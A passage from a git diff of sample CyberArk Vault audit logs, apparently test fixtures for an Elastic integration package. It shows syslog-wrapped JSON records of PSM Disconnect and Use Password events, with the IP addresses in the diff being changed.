67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:35;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.13;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:33:30","IsoTimestamp":"2021-03-15T10:33:30Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:35;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.13;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T10:34:50Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:34:50\n 2021-03-15T10:34:50Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:13;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.13;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:34:50","IsoTimestamp":"2021-03-15T10:34:50Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:01:13;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.13;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T11:12:09Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 04:12:09\n 2021-03-15T11:12:09Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:37:10;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.13;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 04:12:09","IsoTimestamp":"2021-03-15T11:12:09Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:37:10;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.13;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T13:18:36Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:18:36\n 2021-03-15T13:18:36Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:05;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=67.43.156.13;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:18:36","IsoTimestamp":"2021-03-15T13:18:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:05;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=67.43.156.13;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T14:08:11Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:08:11\n 2021-03-15T14:08:11Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:06;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=67.43.156.13;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:08:11","IsoTimestamp":"2021-03-15T14:08:11Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:06;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=67.43.156.13;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T14:08:36Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:08:36\n 2021-03-15T14:08:36Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:09;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=67.43.156.13;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:08:36","IsoTimestamp":"2021-03-15T14:08:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:09;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=67.43.156.13;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814025"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} +<5>1 2021-03-15T15:00:21Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 08:00:21\n 2021-03-15T15:00:21Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:49:12;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;User=testark;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 08:00:21","IsoTimestamp":"2021-03-15T15:00:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:49:12;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;User=testark;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"1"},{"Name":"LastFailDate","Value":"1615819476"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/308_use_password.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/308_use_password.log index 8c77aabf909..3f7c5f3a332 100644 --- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/308_use_password.log +++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/308_use_password.log @@ -1,11 +1,11 @@ {"format":"elastic","version":"1.0","raw":"\n \n no\n Cyber-Ark\n Vault\n 11.6.0000\n 308\n Use Password\n Info\n adm2\n Use Password\n \n \n Windows\n Root\\Operating System-WIN-SERVER-LOCAL-dbserver.cyberark.local-Administrator2\n 10.2.0.6\n \n \n \n (Action: Connect)\n \n Use Password\n 10.2.0.3\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n","syslog":{"audit_record":{"Rfc5424":"no","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.6.0000","MessageID":"308","IsoTimestamp":"2021-03-16T15:01:00Z","Desc":"Use Password","Severity":"Info","Issuer":"adm2","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"Windows","File":"Root\\Operating System-WIN-SERVER-LOCAL-dbserver.cyberark.local-Administrator2","Station":"10.2.0.6","Location":"","Category":"","RequestId":"","Reason":"(Action: Connect)","ExtraDetails":"","Message":"Use Password","GatewayStation":"10.2.0.3","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WIN-SERVER-LOCAL"},{"Name":"UserName","Value":"Administrator2"},{"Name":"Address","Value":"dbserver.cyberark.local"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"LogonDomain","Value":"DBServer"},{"Name":"SequenceID","Value":"1"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"success"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"LastSuccessReconciliation","Value":"1604944215"},{"Name":"Customer","Value":"EvilCorp"}]}}}} -<5>1 2021-03-11T17:38:12Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:12\n 2021-03-11T17:38:12Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 127.0.0.1\n \n \n \n fun and profit\n \n Use Password\n 81.32.170.205\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:12","IsoTimestamp":"2021-03-11T17:38:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"fun and profit","ExtraDetails":"","Message":"Use Password","GatewayStation":"81.32.170.205","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T17:46:49Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:46:49\n 2021-03-11T17:46:49Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 127.0.0.1\n \n \n \n FOR FUN.\n \n Use Password\n 81.32.170.205\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:46:49","IsoTimestamp":"2021-03-11T17:46:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"FOR FUN.","ExtraDetails":"","Message":"Use Password","GatewayStation":"81.32.170.205","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T17:48:27Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:48:27\n 2021-03-11T17:48:27Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 10.0.2.2\n \n \n \n For fun and profit\n \n Use Password\n 81.32.170.205\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:48:27","IsoTimestamp":"2021-03-11T17:48:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"For fun and profit","ExtraDetails":"","Message":"Use Password","GatewayStation":"81.32.170.205","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T17:54:49Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:54:49\n 2021-03-11T17:54:49Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 10.0.2.2\n \n \n \n Because I say so\n \n Use Password\n 81.32.170.205\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:54:49","IsoTimestamp":"2021-03-11T17:54:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"Because I say so","ExtraDetails":"","Message":"Use Password","GatewayStation":"81.32.170.205","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T17:56:30Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:56:30\n 2021-03-11T17:56:30Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 10.0.2.2\n \n \n \n for fun\n \n Use Password\n 81.32.170.205\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:56:30","IsoTimestamp":"2021-03-11T17:56:30Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"for fun","ExtraDetails":"","Message":"Use Password","GatewayStation":"81.32.170.205","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T20:23:17Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 12:23:17\n 2021-03-11T20:23:17Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 10.0.2.2\n \n \n \n testing\n \n Use Password\n 81.32.170.205\n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 12:23:17","IsoTimestamp":"2021-03-11T20:23:17Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"10.0.2.2","Location":"","Category":"","RequestId":"","Reason":"testing","ExtraDetails":"","Message":"Use Password","GatewayStation":"81.32.170.205","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-14T13:49:35Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:49:35\n 2021-03-14T13:49:35Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 81.32.170.205\n \n \n \n \n \n Use Password\n 34.71.250.247\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:35","IsoTimestamp":"2021-03-14T13:49:35Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Use Password","GatewayStation":"34.71.250.247","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T10:31:54Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:31:54\n 2021-03-15T10:31:54Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 81.32.170.205\n \n \n \n \n \n Use Password\n 34.71.250.247\n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:31:54","IsoTimestamp":"2021-03-15T10:31:54Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Use Password","GatewayStation":"34.71.250.247","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T14:08:26Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:08:26\n 2021-03-15T14:08:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 81.32.170.205\n \n \n \n \n \n Use Password\n 34.71.250.247\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:08:26","IsoTimestamp":"2021-03-15T14:08:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Use Password","GatewayStation":"34.71.250.247","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814025"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} -<5>1 2021-03-16T10:04:49Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 16 03:04:49\n 2021-03-16T10:04:49Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 308\n Use Password\n Info\n Administrator\n Use Password\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 81.32.170.205\n \n \n \n \n \n Use Password\n 34.71.250.247\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 16 03:04:49","IsoTimestamp":"2021-03-16T10:04:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"308","Desc":"Use Password","Severity":"Info","Issuer":"Administrator","Action":"Use Password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Use 